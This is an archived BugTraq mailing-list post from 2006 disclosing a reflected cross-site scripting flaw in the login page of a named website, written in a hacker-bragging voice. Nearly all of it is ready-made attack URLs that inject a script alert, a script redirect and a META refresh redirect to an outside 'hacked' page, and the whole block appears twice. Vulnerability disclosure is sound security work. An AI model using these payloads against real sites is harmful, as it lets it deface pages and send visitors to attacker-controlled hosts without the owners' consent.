BugTraq
Back to list
|
Post reply
XSS Vulnerability on www.my6d.com Connection Work System
May 25 2006 05:44PM
spymeta yahoo com
XSS (Cross Site Scripting) on My6D Connection Work System.
We Can Run JScript & HTML Codes & META Tags etc...
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>a
lert('SPYMETA%20WAS%20HERE%20!')</script>
We Can Direct The Page Our Hacked Index....
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>w
indow.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg"</sc
ript>
Or We Can Run Direct Meta Tag..
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<META http-equiv="refresh" content="0; url=http://members.lycos.co.uk/spymeta/hacked..jpg">
Powered / Credit : SPYMETA
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
We Can Run JScript & HTML Codes & META Tags etc...
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>a
lert('SPYMETA%20WAS%20HERE%20!')</script>
We Can Direct The Page Our Hacked Index....
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>w
indow.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg"</sc
ript>
Or We Can Run Direct Meta Tag..
Example :
http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<META http-equiv="refresh" content="0; url=http://members.lycos.co.uk/spymeta/hacked..jpg">
Powered / Credit : SPYMETA
[ reply ]